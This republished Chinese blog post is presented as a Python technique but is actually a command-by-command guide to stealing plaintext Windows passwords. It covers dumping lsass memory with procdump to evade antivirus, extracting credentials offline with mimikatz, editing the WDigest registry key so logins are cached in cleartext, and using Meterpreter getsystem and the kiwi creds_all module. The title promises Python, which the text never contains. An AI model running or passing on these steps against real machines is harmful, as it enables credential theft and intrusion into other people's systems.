gpt4 book ai didi

python简单直接获取windows明文密码操作技巧

转载 作者:qq735679552 更新时间:2022-09-28 22:32:09 32 4
gpt4 key购买 nike

CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.

这篇CFSDN的博客文章python简单直接获取windows明文密码操作技巧由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.

01、Procdump+Mimikatz

利用procdump+Mimikatz 绕过杀软获取Windows明文密码.

(1)工具准备:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump 。

mimikatz:

https://github.com/gentilkiwi/mimikatz/ 。

(2)Windows Server 2008 R2提取明文密码 。

在目标机器上生成存储文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

python简单直接获取windows明文密码操作技巧

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本.

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如图:成功从内存中提取明文密码.

python简单直接获取windows明文密码操作技巧

  。

02、Window 2012 R2抓取密码

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取.

(1)修改注册表 。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用户administrator注销后重新登录,成功抓取到明文信息.

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

python简单直接获取windows明文密码操作技巧

  。

03、MSF kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system.

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限.

meterpreter > getuidServer username: BYPASS-E97BA3FC\Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM

加载kiwi模块:

load kiwi

列举系统中的明文密码:

creds_all

python简单直接获取windows明文密码操作技巧

以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于python获取windows明文密码的资料请关注我其它相关文章! 。

原文链接:https://bypass.blog.csdn.net/article/details/120426613 。

最后此篇关于python简单直接获取windows明文密码操作技巧的文章就讲到这里了,如果你想了解更多关于python简单直接获取windows明文密码操作技巧的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。

32 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com